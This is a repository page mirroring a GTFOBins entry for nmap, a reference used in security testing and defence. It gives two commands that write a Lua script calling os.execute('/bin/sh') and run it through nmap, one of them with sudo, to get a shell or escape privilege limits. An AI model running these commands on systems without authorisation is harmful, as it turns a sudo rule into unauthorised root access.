This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
c20ade4551cbfadb6768b91ab018b7bd47158713
GTFOBins.github.io
/
_gtfobins
/
nmap.md
AlessandroZ
7219385a05
add new ways
2018-08-17 17:16:09 +02:00
269 B
Raw
Blame
History
functions
functions
execute-non-interactive
sudo-enabled
code
echo "os.execute('/bin/sh')" > /tmp/script.nse nmap --script=/tmp/script.nse
code
echo "os.execute('/bin/sh')" > /tmp/script.nse sudo nmap --script=/tmp/script.nse
Reference in New Issue
View Git Blame
Copy Permalink